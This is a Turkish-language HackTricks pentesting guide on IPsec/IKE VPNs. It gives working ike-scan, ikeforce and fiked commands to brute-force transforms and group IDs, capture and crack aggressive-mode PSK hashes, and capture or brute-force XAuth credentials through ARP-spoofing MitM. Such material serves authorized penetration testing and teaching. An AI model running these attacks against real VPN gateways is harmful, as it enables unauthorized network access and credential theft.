hacktricks/network-services-pentesting/ipsec-ike-vpn-pentesting.md

# 500/udp - IPsec/IKE VPN Pentesting

<details>

<summary><strong>AWS hacklemeyi sıfırdan kahramanla öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>!</strong></summary>

HackTricks'ı desteklemenin diğer yolları:

* **Şirketinizi HackTricks'te reklamınızı görmek** veya **HackTricks'i PDF olarak indirmek** için [**ABONELİK PLANLARI'na**](https://github.com/sponsors/carlospolop) göz atın!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**The PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**'u takip edin**.
* **Hacking hilelerinizi** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github reposuna **PR göndererek paylaşın**.

</details>

<figure><img src="/.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure>

En önemli olan zayıflıkları bulun, böylece daha hızlı düzeltebilirsiniz. Intruder saldırı yüzeyinizi takip eder, proaktif tehdit taramaları yapar, API'lerden web uygulamalarına ve bulut sistemlerine kadar tüm teknoloji yığınınızda sorunları bulur. [**Ücretsiz deneyin**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) bugün.

{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}

***

## Temel Bilgiler

**IPsec**, ağlar arasındaki iletişimi (LAN-to-LAN) ve uzaktan kullanıcıların ağ ağ geçidine (uzaktan erişim) güvence altına almak için temel teknoloji olarak geniş çapta kabul edilir ve kurumsal VPN çözümleri için omurga görevi görür.

İki nokta arasında bir **güvenlik birliği (SA)** oluşturulması, kimlik doğrulama ve anahtar değişimi için tasarlanmış bir protokol olan **IKE** tarafından yönetilir ve ISAKMP'nin bir parçası olarak çalışır. Bu süreç birkaç aşamada gerçekleşir:

- **Aşama 1:** İki uç nokta arasında güvenli bir kanal oluşturulur. Bu, bir Ön Paylaşılan Anahtar (PSK) veya sertifikalar kullanılarak gerçekleştirilir ve üç çift mesaj içeren ana mod veya **agresif mod** kullanır.
- **Aşama 1.5:** Zorunlu olmasa da, Genişletilmiş Kimlik Doğrulama Aşaması olarak bilinen bu aşama, bağlanmaya çalışan kullanıcının kimliğini doğrular ve bir kullanıcı adı ve şifre gerektirir.
- **Aşama 2:** Bu aşama, **ESP** ve **AH** ile verileri güvence altına almak için parametreleri müzakere etmeye adanmıştır. Aşama 1'deki algoritmalardan farklı algoritmaların kullanılmasına izin verir ve güvenliği artırmak için **Mükemmel İleri Gizlilik (PFS)** sağlar.

**Varsayılan port:** 500/udp

## nmap kullanarak hizmeti keşfedin
```
root@bt:~# nmap -sU -p 500 172.16.21.200
Starting Nmap 5.51 (http://nmap.org) at 2011-11-26 10:56 IST
Nmap scan report for 172.16.21.200
Host is up (0.00036s latency).
PORT    STATE SERVICE
500/udp open  isakmp
MAC Address: 00:1B:D5:54:4D:E4 (Cisco Systems)
```
## **Geçerli bir dönüşüm bulma**

IPSec yapılandırması, yalnızca bir veya birkaç dönüşümü kabul etmek üzere hazırlanabilir. Bir dönüşüm, değerlerin bir kombinasyonudur. **Her dönüşüm**, şifreleme algoritması olarak DES veya 3DES gibi birkaç özelliğe sahiptir, bütünlük algoritması olarak SHA veya MD5 gibi birkaç özelliğe sahiptir, kimlik doğrulama türü olarak önceden paylaşılan bir anahtar gibi birkaç özelliğe sahiptir, anahtar dağıtım algoritması olarak Diffie-Hellman 1 veya 2 gibi birkaç özelliğe sahiptir ve ömür olarak 28800 saniye gibi birkaç özelliğe sahiptir.

Daha sonra yapmanız gereken ilk şey, sunucu sizinle iletişim kurabilsin diye **geçerli bir dönüşüm bulmaktır**. Bunun için **ike-scan** aracını kullanabilirsiniz. Varsayılan olarak, Ike-scan ana modda çalışır ve bir ISAKMP başlığı ve içinde sekiz dönüşüm bulunan tek bir öneri ile bir paket gönderir.

Yanıta bağlı olarak uç nokta hakkında bazı bilgiler elde edebilirsiniz:
```
root@bt:~# ike-scan -M 172.16.21.200
Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
172.16.21.200    Main Mode Handshake returned
HDR=(CKY-R=d90bf054d6b76401)
SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
VID=4048b7d56ebce88525e7de7f00d6c2d3c0000000 (IKE Fragmentation)

Ending ike-scan 1.9: 1 hosts scanned in 0.015 seconds (65.58 hosts/sec). 1 returned handshake; 0 returned notify
```
Görüldüğü gibi önceki yanıtta **AUTH** adında bir alan ve **PSK** değeriyle birlikte olduğunu görebilirsiniz. Bu, vpn'in bir önceden paylaşılan anahtar kullanılarak yapılandırıldığı anlamına gelir (ve bu bir pentester için gerçekten iyidir).\
**Son satırın değeri de çok önemlidir:**

* _0 el sıkışma döndürüldü; 0 bildirim döndürüldü:_ Bu, hedefin bir **IPsec ağ geçidi olmadığını** gösterir.
* _**1 el sıkışma döndürüldü; 0 bildirim döndürüldü:**_ Bu, **hedefin IPsec için yapılandırıldığını ve IKE müzakeresi yapmaya istekli olduğunu ve önerdiğiniz dönüşümlerden bir veya daha fazlasının kabul edilebilir olduğunu** gösterir (geçerli bir dönüşüm çıktıda gösterilecektir).
* _0 el sıkışma döndürüldü; 1 bildirim döndürüldü:_ VPN ağ geçitleri, **hiçbir dönüşümün kabul edilebilir olmadığında** bir bildirim mesajıyla yanıt verir (ancak bazı ağ geçitleri bunu yapmaz, bu durumda daha fazla analiz ve revize edilmiş bir öneri denemelisiniz).

Bu durumda zaten geçerli bir dönüşümümüz var, ancak 3. durumdaysanız, geçerli bir dönüşüm bulmak için **biraz brute-force yapmanız gerekecektir:**

İlk olarak, tüm olası dönüşümleri oluşturmanız gerekmektedir:
```bash
for ENC in 1 2 3 4 5 6 7/128 7/192 7/256 8; do for HASH in 1 2 3 4 5 6; do for AUTH in 1 2 3 4 5 6 7 8 64221 64222 64223 64224 65001 65002 65003 65004 65005 65006 65007 65008 65009 65010; do for GROUP in 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18; do echo "--trans=$ENC,$HASH,$AUTH,$GROUP" >> ike-dict.txt ;done ;done ;done ;done
```
Ve ardından ike-scan kullanarak her birini brute-force yöntemiyle deneyin (bu birkaç dakika sürebilir):
```bash
while read line; do (echo "Valid trans found: $line" && sudo ike-scan -M $line <IP>) | grep -B14 "1 returned handshake" | grep "Valid trans found" ; done < ike-dict.txt
```
Eğer brute-force yöntemi işe yaramadıysa, belki sunucu geçerli dönüşümlere bile el sıkışma yapmadan yanıt veriyor. Bu durumda, aynı brute-force yöntemini kullanarak saldırgan modunu deneyebilirsiniz:
```bash
while read line; do (echo "Valid trans found: $line" && ike-scan -M --aggressive -P handshake.txt $line <IP>) | grep -B7 "SA=" | grep "Valid trans found" ; done < ike-dict.txt
```
Umarım **geçerli bir dönüşüm yansıtılır**.\
Aynı saldırıyı [**iker.py**](https://github.com/isaudits/scripts/blob/master/iker.py) kullanarak deneyebilirsiniz.\
Ayrıca [**ikeforce**](https://github.com/SpiderLabs/ikeforce) ile dönüşümleri kaba kuvvet saldırısıyla deneyebilirsiniz:
```bash
./ikeforce.py <IP> # No parameters are required for scan -h for additional help
```
![](<../.gitbook/assets/image (109).png>)

**DH Grubu: 14 = 2048-bit MODP** ve **15 = 3072-bit**\
**2 = HMAC-SHA = SHA1 (bu durumda). `--trans` formatı $Enc,$Hash,$Auth,$DH'dir.**

Cisco, DH gruplarının 1 ve 2'nin yeterince güçlü olmadığını belirtmektedir. Uzmanlar, bu zayıf grupları kullanan verilerin şifrelemesini **kırmak için** özel bir yöntem kullanarak **kaynakları bol olan ülkelerin** bunu kolayca yapabileceğine inanmaktadır. Bu yöntemi kurmak çok para harcamasına rağmen, bu güçlü ülkelerin, şifrelenmiş verileri gerçek zamanlı olarak okumasına izin verir (örneğin, 1.024-bit veya daha küçük gibi) zayıf bir grup kullanılıyorsa.

### Sunucu parmak izi alma

Ardından, cihazın **üreticisini keşfetmek için ike-scan** kullanabilirsiniz. Araç, bir başlangıç teklifi gönderir ve tekrar oynatmayı durdurur. Ardından, sunucudan alınan mesajlar ile eşleşen yanıt deseni arasındaki **zaman farkını analiz ederek**, pentester VPN ağ geçidinin üreticisini başarıyla belirleyebilir. Dahası, bazı VPN sunucuları IKE ile **isteğe bağlı Vendor ID (VID) yükü** kullanacaktır.

**Gerekirse geçerli dönüşümü belirtin** (using --trans)

Eğer IKE, üreticiyi belirlerse, bunu yazdıracaktır:
```
root@bt:~# ike-scan -M --showbackoff 172.16.21.200
Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
172.16.21.200    Main Mode Handshake returned
HDR=(CKY-R=4f3ec84731e2214a)
SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
VID=4048b7d56ebce88525e7de7f00d6c2d3c0000000 (IKE Fragmentation)

IKE Backoff Patterns:

IP Address       No.  Recv time            Delta Time
172.16.21.200    1    1322286031.744904    0.000000
172.16.21.200    2    1322286039.745081    8.000177
172.16.21.200    3    1322286047.745989    8.000908
172.16.21.200    4    1322286055.746972    8.000983
172.16.21.200    Implementation guess: Cisco VPN Concentrator

Ending ike-scan 1.9: 1 hosts scanned in 84.080 seconds (0.01 hosts/sec). 1 returned handshake; 0 returned notify
```
Bu, nmap betiği _**ike-version**_ ile de başarılabilir.

## Doğru Kimlik (grup adı) Bulma

Hash'i yakalayabilmek için Agresif modu destekleyen ve doğru Kimlik (grup adı) gerekiyor. Muhtemelen doğru grup adını bilmeyeceksiniz, bu yüzden brute-force yapmanız gerekecek.\
Bunu yapmak için size 2 yöntem öneririm:

### ike-scan ile Kimlik brute-force

Öncelikle, hash'i toplamak için sahte bir Kimlik ile bir istek yapmayı deneyin ("-P"):
```bash
ike-scan -P -M -A -n fakeID <IP>
```
Eğer **hiçbir karma döndürülmezse**, o zaman muhtemelen bu brute force yöntemi işe yarayacaktır. **Eğer bir karma döndürülürse, bu, sahte bir kimlik için sahte bir karma gönderileceği anlamına gelir, bu nedenle bu yöntem kimliği brute force etmek için güvenilir olmayacaktır**. Örneğin, sahte bir karma döndürülebilir (bu modern sürümlerde olur):

![](<../.gitbook/assets/image (110).png>)

Ancak, dediğim gibi, hiçbir karma döndürülmezse, ike-scan kullanarak yaygın grup adlarını brute force etmeyi denemelisiniz.

Bu betik, **mümkün olan kimlikleri brute force etmeye çalışacak** ve geçerli bir el sıkışma döndürülen kimlikleri (bu geçerli bir grup adı olacak) döndürecektir.

Eğer belirli bir dönüşüm keşfettiyseniz, ike-scan komutuna ekleyin. Ve eğer birden fazla dönüşüm keşfettiyseniz, hepsini denemek için yeni bir döngü eklemekte özgürsünüz (hepsini düzgün çalışana kadar hepsini denemelisiniz).

Bu işlemi brute force etmek için ikeforce'un [sözlüğünü](https://github.com/SpiderLabs/ikeforce/blob/master/wordlists/groupnames.dic) veya yaygın grup adlarının bulunduğu seclists'in [birini](https://github.com/danielmiessler/SecLists/blob/master/Miscellaneous/ike-groupid.txt) kullanabilirsiniz:
```bash
while read line; do (echo "Found ID: $line" && sudo ike-scan -M -A -n $line <IP>) | grep -B14 "1 returned handshake" | grep "Found ID:"; done < /usr/share/wordlists/external/SecLists/Miscellaneous/ike-groupid.txt
```
Veya bu sözlüğü kullanın (tekrarları olmadan diğer 2 sözlüğün birleşimi):

{% file src="../.gitbook/assets/vpnIDs.txt" %}

### Iker ile ID'yi Bruteforce Etme

[**iker.py**](https://github.com/isaudits/scripts/blob/master/iker.py), olası grup adlarını bruteforce etmek için **ike-scan** kullanır. **ike-scan** çıktısına dayanarak geçerli bir ID bulmak için kendi yöntemini izler.

### Ikeforce ile ID'yi Bruteforce Etme

[**ikeforce.py**](https://github.com/SpiderLabs/ikeforce), **ID'leri bruteforce etmek** için kullanılan bir araçtır. Bu araç, **geçerli ve geçersiz bir ID arasındaki farkı belirlemek** için kullanılabilecek **farklı güvenlik açıklarını** kullanmaya çalışacaktır (yanlış pozitif ve yanlış negatif sonuçlar olabilir, bu yüzden mümkünse ike-scan yöntemini tercih ederim).

Varsayılan olarak, **ikeforce** başlangıçta sunucunun davranışını kontrol etmek ve kullanılacak taktiği belirlemek için bazı rastgele ID'ler gönderir.

* **İlk yöntem**, Cisco sistemlerinin **Dead Peer Detection DPD** bilgisini (bu bilgi yalnızca grup adı doğruysa sunucu tarafından yanıtlanır) arayarak grup adlarını bruteforce etmektir.
* **İkinci yöntem**, her denemeye gönderilen yanıtların sayısını kontrol eder çünkü doğru ID kullanıldığında bazen daha fazla paket gönderilir.
* **Üçüncü yöntem**, yanlış ID'ye yanıt olarak "INVALID-ID-INFORMATION" aramaktır.
* Son olarak, sunucu kontrollerine hiçbir yanıt vermezse, **ikeforce** sunucuyu bruteforce etmeye çalışacak ve doğru ID gönderildiğinde sunucunun bir paketle yanıt verip vermediğini kontrol edecektir.\
Açıkçası, ID'yi bruteforce etmenin amacı, geçerli bir ID'ye sahip olduğunuzda **PSK'yi** elde etmektir. Ardından, **ID** ve **PSK** ile XAUTH'ı (etkinse) bruteforce etmeniz gerekecektir.

Belirli bir dönüşüm keşfettiyseniz, ikeforce komutuna ekleyin. Ve birden fazla dönüşüm keşfettiyseniz, hepsini denemek için yeni bir döngü eklemekte özgürsünüz (hepsini düzgün çalışana kadar denemelisiniz).
```bash
git clone https://github.com/SpiderLabs/ikeforce.git
pip install 'pyopenssl==17.2.0' #It is old and need this version of the library
```

```bash
./ikeforce.py <IP> -e -w ./wordlists/groupnames.dic
```
### ID Yakalama

(**Network Security Assessment: Ağınızı Tanıyın** kitabından): VPN istemcisi ve sunucusu arasındaki bağlantıyı dinleyerek geçerli kullanıcı adlarını elde etmek de mümkündür, çünkü istemci kimliğini içeren ilk saldırgan mod paketi açık bir şekilde gönderilir.

![](<../.gitbook/assets/image (111).png>)

## Hash Yakalama ve Kırma

Son olarak, bir **geçerli dönüşüm** ve **grup adı** bulduysanız ve **saldırgan mod izin veriliyorsa**, o zaman çözülebilir hash'i çok kolay bir şekilde yakalayabilirsiniz:
```bash
ike-scan -M -A -n <ID> --pskcrack=hash.txt <IP> #If aggressive mode is supported and you know the id, you can get the hash of the passwor
```
Hash _hash.txt_ içine kaydedilecektir.

Hash'i **kırmak** için **psk-crack**, **john** ( [**ikescan2john.py**](https://github.com/truongkma/ctf-tools/blob/master/John/run/ikescan2john.py) kullanarak) ve **hashcat** kullanabilirsiniz:
```bash
psk-crack -d <Wordlist_path> psk.txt
```
## **XAuth**

**Grup kimlik doğrulama** amaçları için genellikle **Ön Paylaşılan Anahtar (PSK)** ile birlikte **Agresif Mod IKE** kullanılır. Bu yöntem, **XAuth (Genişletilmiş Kimlik Doğrulama)** ile desteklenir ve ek bir **kullanıcı kimlik doğrulama** katmanı ekler. Bu tür kimlik doğrulama genellikle **Microsoft Active Directory**, **RADIUS** veya benzeri sistemler gibi hizmetlerden yararlanır.

**IKEv2**'ye geçişte, kullanıcıların kimlik doğrulaması için **XAuth** yerine **EAP (Genişletilebilir Kimlik Doğrulama Protokolü)** kullanıldığı dikkat çekmektedir. Bu değişiklik, güvenli iletişim protokollerinde kimlik doğrulama uygulamalarında bir evrimi vurgular.


### Kimlik bilgilerini yakalamak için Yerel Ağ MitM

Böylece, _fiked_ kullanarak giriş verilerini yakalayabilir ve herhangi bir varsayılan kullanıcı adı olup olmadığını görebilirsiniz (IKE trafiğini dinlemek için ARP sahtekarlığıyla `fiked`'e yönlendirmeniz gerekmektedir, [daha fazla bilgi](https://opensourceforu.com/2012/01/ipsec-vpn-penetration-testing-backtrack-tools/)). Fiked, bir VPN uç noktası gibi davranacak ve XAuth kimlik bilgilerini yakalayacaktır:
```bash
fiked -g <IP> -k testgroup:secretkey -l output.txt -d
```
Ayrıca, IPSec kullanarak bir MitM saldırısı yapmaya çalışın ve tüm trafiği 500 numaralı porta engelleyin, eğer IPSec tüneli kurulamazsa, trafiğin açık olarak gönderilebilir.

### ikeforce ile XAUTH kullanıcı adı ve şifresini brute force etmek

**XAUTH**'u brute force etmek için (geçerli bir grup adı **id** ve **psk**'yi bildiğinizde) bir kullanıcı adı veya kullanıcı adı listesi ve bir şifre listesi kullanabilirsiniz:
```bash
./ikeforce.py <IP> -b -i <group_id> -u <username> -k <PSK> -w <passwords.txt> [-s 1]
```
Bu şekilde, ikeforce, her bir kullanıcı adı:parola kombinasyonunu kullanarak bağlantı deneyecektir.

Eğer bir veya birkaç geçerli dönüşüm bulduysanız, bunları önceki adımlarda olduğu gibi kullanın.

## IPSEC VPN ile Kimlik Doğrulama

Kali'de, IPsec tünelleri kurmak için **VPNC** kullanılır. **Profiller**, `/etc/vpnc/` dizininde bulunmalıdır. Bu profilleri _**vpnc**_ komutunu kullanarak başlatabilirsiniz.

Aşağıdaki komutlar ve yapılandırmalar, VPNC ile bir VPN bağlantısı kurma sürecini göstermektedir:
```bash
root@system:~# cat > /etc/vpnc/samplevpn.conf << STOP
IPSec gateway [VPN_GATEWAY_IP]
IPSec ID [VPN_CONNECTION_ID]
IPSec secret [VPN_GROUP_SECRET]
IKE Authmode psk
Xauth username [VPN_USERNAME]
Xauth password [VPN_PASSWORD]
STOP
root@system:~# vpnc samplevpn
VPNC started in background (pid: [PID])...
root@system:~# ifconfig tun0
```
Bu kurulumda:

- `[VPN_GATEWAY_IP]` ifadesini VPN ağ geçidinin gerçek IP adresiyle değiştirin.
- `[VPN_CONNECTION_ID]` ifadesini VPN bağlantısının tanımlayıcısıyla değiştirin.
- `[VPN_GROUP_SECRET]` ifadesini VPN'nin grup parolasıyla değiştirin.
- `[VPN_USERNAME]` ve `[VPN_PASSWORD]` ifadelerini VPN kimlik doğrulama bilgileriyle değiştirin.
- `[PID]`, `vpnc` başlatıldığında atanacak işlem kimliğini simgeler.

VPN yapılandırması yapılırken yer tutucuların yerine gerçek, güvenli değerlerin kullanıldığından emin olun.

## Referans Materyal

* [PSK kırma makalesi](http://www.ernw.de/download/pskattack.pdf)
* [SecurityFocus Infocus](http://www.securityfocus.com/infocus/1821)
* [VPN Uygulamasını Tarama](http://www.radarhack.com/dir/papers/Scanning\_ike\_with\_ikescan.pdf)
* Network Security Assessment 3. Baskı

## Shodan

* `port:500 IKE`

<figure><img src="broken-reference" alt=""><figcaption></figcaption></figure>

En önemli güvenlik açıklarını bulun ve daha hızlı düzeltebilin. Intruder saldırı yüzeyinizi takip eder, proaktif tehdit taramaları yapar, API'lerden web uygulamalarına ve bulut sistemlerine kadar tüm teknoloji yığınınızda sorunları bulur. [**Ücretsiz deneyin**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) bugün.

{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}

<details>

<summary><strong>htARTE (HackTricks AWS Red Team Expert)</strong> ile sıfırdan kahraman olmak için AWS hackleme öğrenin<strong>!</strong></summary>

HackTricks'i desteklemenin diğer yolları:

* Şirketinizi HackTricks'te **reklamınızı görmek** veya **HackTricks'i PDF olarak indirmek** için [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* Özel [**NFT'lerden**](https://opensea.io/collection/the-peass-family) oluşan koleksiyonumuz [**The PEASS Family**](https://opensea.io/collection/the-peass-family)'i keşfedin
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya bizi **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**'da takip edin**.
* **Hacking hilelerinizi** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına PR göndererek paylaşın.

</details>